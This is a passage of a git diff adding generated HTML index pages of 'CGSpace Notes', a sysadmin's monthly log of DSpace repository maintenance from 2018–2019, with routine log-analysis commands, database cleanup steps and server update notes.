+   2472 163.172.71.23
+   6092 3.94.211.189
+# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+     33 2a01:7e00::f03c:91ff:fe16:fcb
+     57 3.83.192.124
+     57 3.87.77.25
+     57 54.82.1.8
+    822 2a01:9cc0:47:1:1a:4:0:2
+   1223 45.5.184.72
+   1633 172.104.229.92
+   5112 205.186.128.185
+   7249 2a01:7e00::f03c:91ff:fe18:7396
+   9124 45.5.186.2
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2019-09/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-08/">August, 2019</a></h2>
+    <p class="blog-post-meta"><time datetime="2019-08-03T12:39:51+03:00">Sat Aug 03, 2019</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2019-08-03">2019-08-03</h2>
+<ul>
+<li>Look at Bioversity&rsquo;s latest migration CSV and now I see that Francesco has cleaned up the extra columns and the newline at the end of the file, but many of the column headers have an extra space in the name&hellip;</li>
+</ul>
+<h2 id="2019-08-04">2019-08-04</h2>
+<ul>
+<li>Deploy ORCID identifier updates requested by Bioversity to CGSpace</li>
+<li>Run system updates on CGSpace (linode18) and reboot it
+<ul>
+<li>Before updating it I checked Solr and verified that all statistics cores were loaded properly&hellip;</li>
+<li>After rebooting, all statistics cores were loaded&hellip; wow, that&rsquo;s lucky.</li>
+</ul>
+</li>
+<li>Run system updates on DSpace Test (linode19) and reboot it</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2019-08/'>Read more →</a>
+</article> 
+
+
+
+
+
+<nav class="blog-pagination">
+  
+  <a class="btn btn-outline-primary" href="/cgspace-notes/page/4/" rel="prev" role="button">Previous page</a>
+  <a class="btn btn-outline-primary" href="/cgspace-notes/page/6/" rel="next" role="button">Next page</a>
+  
+  
+  
+</nav>
+
+
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/page/6/index.html b/docs/page/6/index.html
new file mode 100644
index 000000000..a25e62091
--- /dev/null
+++ b/docs/page/6/index.html
@@ -0,0 +1,488 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="CGSpace Notes" />
+<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
+<meta property="og:type" content="website" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/" />
+<meta property="og:updated_time" content="2023-07-01T17:17:31+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="CGSpace Notes"/>
+<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "Blog",
+  "headline": "CGSpace Notes",
+  "url" : "https://alanorth.github.io/cgspace-notes/",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "dateModified": "2023-07-01T17:14:36+03:00",
+  "keywords": "notes, migration, notes",
+  "description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
+}
+</script>
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/">
+
+    <title>CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    <link rel="alternate" type="application/rss+xml" href="https://alanorth.github.io/cgspace-notes/index.xml" title="CGSpace Notes" />
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link active" href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-07/">July, 2019</a></h2>
+    <p class="blog-post-meta"><time datetime="2019-07-01T12:13:51+03:00">Mon Jul 01, 2019</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2019-07-01">2019-07-01</h2>
+<ul>
+<li>Create an &ldquo;AfricaRice books and book chapters&rdquo; collection on CGSpace for AfricaRice</li>
+<li>Last month Sisay asked why the following &ldquo;most popular&rdquo; statistics link for a range of months in 2018 works for the CIAT community on DSpace Test, but not on CGSpace:
+<ul>
+<li><a href="https://dspacetest.cgiar.org/handle/10568/35697/most-popular/item#simplefilter=custom&amp;time_filter_end_date=01%2F12%2F2018">DSpace Test</a></li>
+<li><a href="https://cgspace.cgiar.org/handle/10568/35697/most-popular/item#simplefilter=custom&amp;time_filter_end_date=01%2F12%2F2018">CGSpace</a></li>
+</ul>
+</li>
+<li>Abenet had another similar issue a few days ago when trying to find the stats for 2018 in the RTB community</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2019-07/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-06/">June, 2019</a></h2>
+    <p class="blog-post-meta"><time datetime="2019-06-02T10:57:51+03:00">Sun Jun 02, 2019</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2019-06-02">2019-06-02</h2>
+<ul>
+<li>Merge the <a href="https://github.com/ilri/DSpace/pull/425">Solr filterCache</a> and <a href="https://github.com/ilri/DSpace/pull/426">XMLUI ISI journal</a> changes to the <code>5_x-prod</code> branch and deploy on CGSpace</li>
+<li>Run system updates on CGSpace (linode18) and reboot it</li>
+</ul>
+<h2 id="2019-06-03">2019-06-03</h2>
+<ul>
+<li>Skype with Marie-Angélique and Abenet about <a href="https://agriculturalsemantics.github.io/cg-core/cgcore.html">CG Core v2</a></li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2019-06/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-05/">May, 2019</a></h2>
+    <p class="blog-post-meta"><time datetime="2019-05-01T07:37:43+03:00">Wed May 01, 2019</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2019-05-01">2019-05-01</h2>
+<ul>
+<li>Help CCAFS with regenerating some item thumbnails after they uploaded new PDFs to some items on CGSpace</li>
+<li>A user on the dspace-tech mailing list offered some suggestions for troubleshooting the problem with the inability to delete certain items
+<ul>
+<li>Apparently if the item is in the <code>workflowitem</code> table it is submitted to a workflow</li>
+<li>And if it is in the <code>workspaceitem</code> table it is in the pre-submitted state</li>
+</ul>
+</li>
+<li>The item seems to be in a pre-submitted state, so I tried to delete it from there:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# DELETE FROM workspaceitem WHERE item_id=74648;
+DELETE 1
+</code></pre><ul>
+<li>But after this I tried to delete the item from the XMLUI and it is <em>still</em> present&hellip;</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2019-05/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-04/">April, 2019</a></h2>
+    <p class="blog-post-meta"><time datetime="2019-04-01T09:00:43+03:00">Mon Apr 01, 2019</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2019-04-01">2019-04-01</h2>
+<ul>
+<li>Meeting with AgroKnow to discuss CGSpace, ILRI data, AReS, GARDIAN, etc
+<ul>
+<li>They asked if we had plans to enable RDF support in CGSpace</li>
+</ul>
+</li>
+<li>There have been 4,400 more downloads of the CTA Spore publication from those strange Amazon IP addresses today
+<ul>
+<li>I suspected that some might not be successful, because the stats show less, but today they were all HTTP 200!</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#39;Spore-192-EN-web.pdf&#39; | grep -E &#39;(18.196.196.108|18.195.78.144|18.195.218.6)&#39; | awk &#39;{print $9}&#39; | sort | uniq -c | sort -n | tail -n 5
+   4432 200
+</code></pre><ul>
+<li>In the last two weeks there have been 47,000 downloads of this <em>same exact PDF</em> by these three IP addresses</li>
+<li>Apply country and region corrections and deletions on DSpace Test and CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.country -m 228 -t ACTION -d
+$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.region -m 231 -t action -d
+$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 228 -f cg.coverage.country -d
+$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 231 -f cg.coverage.region -d
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2019-04/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-03/">March, 2019</a></h2>
+    <p class="blog-post-meta"><time datetime="2019-03-01T12:16:30+01:00">Fri Mar 01, 2019</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2019-03-01">2019-03-01</h2>
+<ul>
+<li>I checked IITA&rsquo;s 259 Feb 14 records from last month for duplicates using Atmire&rsquo;s Duplicate Checker on a fresh snapshot of CGSpace on my local machine and everything looks good</li>
+<li>I am now only waiting to hear from her about where the items should go, though I assume Journal Articles go to IITA Journal Articles collection, etc&hellip;</li>
+<li>Looking at the other half of Udana&rsquo;s WLE records from 2018-11
+<ul>
+<li>I finished the ones for Restoring Degraded Landscapes (RDL), but these are for Variability, Risks and Competing Uses (VRC)</li>
+<li>I did the usual cleanups for whitespace, added regions where they made sense for certain countries, cleaned up the DOI link formats, added rights information based on the publications page for a few items</li>
+<li>Most worryingly, there are encoding errors in the abstracts for eleven items, for example:</li>
+<li>68.15% � 9.45 instead of 68.15% ± 9.45</li>
+<li>2003�2013 instead of 2003–2013</li>
+</ul>
+</li>
+<li>I think I will need to ask Udana to re-copy and paste the abstracts with more care using Google Docs</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2019-03/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-02/">February, 2019</a></h2>
+    <p class="blog-post-meta"><time datetime="2019-02-01T21:37:30+02:00">Fri Feb 01, 2019</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2019-02-01">2019-02-01</h2>
+<ul>
+<li>Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!</li>
+<li>The top IPs before, during, and after this latest alert tonight were:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;01/Feb/2019:(17|18|19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    245 207.46.13.5
+    332 54.70.40.11
+    385 5.143.231.38
+    405 207.46.13.173
+    405 207.46.13.75
+   1117 66.249.66.219
+   1121 35.237.175.180
+   1546 5.9.6.51
+   2474 45.5.186.2
+   5490 85.25.237.71
+</code></pre><ul>
+<li><code>85.25.237.71</code> is the &ldquo;Linguee Bot&rdquo; that I first saw last month</li>
+<li>The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase</li>
+<li>There were just over 3 million accesses in the nginx logs last month:</li>
+</ul>
+<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Jan/2019&#34;
+3018243
+
+real    0m19.873s
+user    0m22.203s
+sys     0m1.979s
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2019-02/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-01/">January, 2019</a></h2>
+    <p class="blog-post-meta"><time datetime="2019-01-02T09:48:30+02:00">Wed Jan 02, 2019</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2019-01-02">2019-01-02</h2>
+<ul>
+<li>Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning</li>
+<li>I don&rsquo;t see anything interesting in the web server logs around that time though:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+     92 40.77.167.4
+     99 210.7.29.100
+    120 38.126.157.45
+    177 35.237.175.180
+    177 40.77.167.32
+    216 66.249.75.219
+    225 18.203.76.93
+    261 46.101.86.248
+    357 207.46.13.1
+    903 54.70.40.11
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2019-01/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-12/">December, 2018</a></h2>
+    <p class="blog-post-meta"><time datetime="2018-12-02T02:09:30+02:00">Sun Dec 02, 2018</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-12-01">2018-12-01</h2>
+<ul>
+<li>Switch CGSpace (linode18) to use OpenJDK instead of Oracle JDK</li>
+<li>I manually installed OpenJDK, then removed Oracle JDK, then re-ran the <a href="http://github.com/ilri/rmg-ansible-public">Ansible playbook</a> to update all configuration files, etc</li>
+<li>Then I ran all system updates and restarted the server</li>
+</ul>
+<h2 id="2018-12-02">2018-12-02</h2>
+<ul>
+<li>I noticed that there is another issue with PDF thumbnails on CGSpace, and I see there was another <a href="https://usn.ubuntu.com/3831-1/">Ghostscript vulnerability last week</a></li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2018-12/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-11/">November, 2018</a></h2>
+    <p class="blog-post-meta"><time datetime="2018-11-01T16:41:30+02:00">Thu Nov 01, 2018</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-11-01">2018-11-01</h2>
+<ul>
+<li>Finalize AReS Phase I and Phase II ToRs</li>
+<li>Send a note about my <a href="https://github.com/ilri/dspace-statistics-api">dspace-statistics-api</a> to the dspace-tech mailing list</li>
+</ul>
+<h2 id="2018-11-03">2018-11-03</h2>
+<ul>
+<li>Linode has been sending mails a few times a day recently that CGSpace (linode18) has had high CPU usage</li>
+<li>Today these are the top 10 IPs:</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2018-11/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-10/">October, 2018</a></h2>
+    <p class="blog-post-meta"><time datetime="2018-10-01T22:31:54+03:00">Mon Oct 01, 2018</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-10-01">2018-10-01</h2>
+<ul>
+<li>Phil Thornton got an ORCID identifier so we need to add it to the list on CGSpace and tag his existing items</li>
+<li>I created a GitHub issue to track this <a href="https://github.com/ilri/DSpace/issues/389">#389</a>, because I&rsquo;m super busy in Nairobi right now</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2018-10/'>Read more →</a>
+</article> 
+
+
+
+
+
+<nav class="blog-pagination">
+  
+  <a class="btn btn-outline-primary" href="/cgspace-notes/page/5/" rel="prev" role="button">Previous page</a>
+  <a class="btn btn-outline-primary" href="/cgspace-notes/page/7/" rel="next" role="button">Next page</a>
+  
+  
+  
+</nav>
+
+
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/page/7/index.html b/docs/page/7/index.html
new file mode 100644
index 000000000..600f2a24c
--- /dev/null
+++ b/docs/page/7/index.html
@@ -0,0 +1,497 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="CGSpace Notes" />
+<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
+<meta property="og:type" content="website" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/" />
+<meta property="og:updated_time" content="2023-07-01T17:17:31+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="CGSpace Notes"/>
+<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "Blog",
+  "headline": "CGSpace Notes",
+  "url" : "https://alanorth.github.io/cgspace-notes/",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "dateModified": "2023-07-01T17:14:36+03:00",
+  "keywords": "notes, migration, notes",
+  "description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
+}
+</script>
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/">
+
+    <title>CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    <link rel="alternate" type="application/rss+xml" href="https://alanorth.github.io/cgspace-notes/index.xml" title="CGSpace Notes" />
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link active" href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-09/">September, 2018</a></h2>
+    <p class="blog-post-meta"><time datetime="2018-09-02T09:55:54+03:00">Sun Sep 02, 2018</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-09-02">2018-09-02</h2>
+<ul>
+<li>New <a href="https://jdbc.postgresql.org/documentation/changelog.html#version_42.2.5">PostgreSQL JDBC driver version 42.2.5</a></li>
+<li>I&rsquo;ll update the DSpace role in our <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure playbooks</a> and run the updated playbooks on CGSpace and DSpace Test</li>
+<li>Also, I&rsquo;ll re-run the <code>postgresql</code> tasks because the custom PostgreSQL variables are dynamic according to the system&rsquo;s RAM, and we never re-ran them after migrating to larger Linodes last month</li>
+<li>I&rsquo;m testing the new DSpace 5.8 branch in my Ubuntu 18.04 environment and I&rsquo;m getting those autowire errors in Tomcat 8.5.30 again:</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2018-09/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-08/">August, 2018</a></h2>
+    <p class="blog-post-meta"><time datetime="2018-08-01T11:52:54+03:00">Wed Aug 01, 2018</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-08-01">2018-08-01</h2>
+<ul>
+<li>DSpace Test had crashed at some point yesterday morning and I see the following in <code>dmesg</code>:</li>
+</ul>
+<pre tabindex="0"><code>[Tue Jul 31 00:00:41 2018] Out of memory: Kill process 1394 (java) score 668 or sacrifice child
+[Tue Jul 31 00:00:41 2018] Killed process 1394 (java) total-vm:15601860kB, anon-rss:5355528kB, file-rss:0kB, shmem-rss:0kB
+[Tue Jul 31 00:00:41 2018] oom_reaper: reaped process 1394 (java), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
+</code></pre><ul>
+<li>Judging from the time of the crash it was probably related to the Discovery indexing that starts at midnight</li>
+<li>From the DSpace log I see that eventually Solr stopped responding, so I guess the <code>java</code> process that was OOM killed above was Tomcat&rsquo;s</li>
+<li>I&rsquo;m not sure why Tomcat didn&rsquo;t crash with an OutOfMemoryError&hellip;</li>
+<li>Anyways, perhaps I should increase the JVM heap from 5120m to 6144m like we did a few months ago when we tried to run the whole CGSpace Solr core</li>
+<li>The server only has 8GB of RAM so we&rsquo;ll eventually need to upgrade to a larger one because we&rsquo;ll start starving the OS, PostgreSQL, and command line batch processes</li>
+<li>I ran all system updates on DSpace Test and rebooted it</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2018-08/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-07/">July, 2018</a></h2>
+    <p class="blog-post-meta"><time datetime="2018-07-01T12:56:54+03:00">Sun Jul 01, 2018</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-07-01">2018-07-01</h2>
+<ul>
+<li>I want to upgrade DSpace Test to DSpace 5.8 so I took a backup of its current database just in case:</li>
+</ul>
+<pre tabindex="0"><code>$ pg_dump -b -v -o --format=custom -U dspace -f dspace-2018-07-01.backup dspace
+</code></pre><ul>
+<li>During the <code>mvn package</code> stage on the 5.8 branch I kept getting issues with java running out of memory:</li>
+</ul>
+<pre tabindex="0"><code>There is insufficient memory for the Java Runtime Environment to continue.
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2018-07/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-06/">June, 2018</a></h2>
+    <p class="blog-post-meta"><time datetime="2018-06-04T19:49:54-07:00">Mon Jun 04, 2018</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-06-04">2018-06-04</h2>
+<ul>
+<li>Test the <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=560">DSpace 5.8 module upgrades from Atmire</a> (<a href="https://github.com/ilri/DSpace/pull/378">#378</a>)
+<ul>
+<li>There seems to be a problem with the CUA and L&amp;R versions in <code>pom.xml</code> because they are using SNAPSHOT and it doesn&rsquo;t build</li>
+</ul>
+</li>
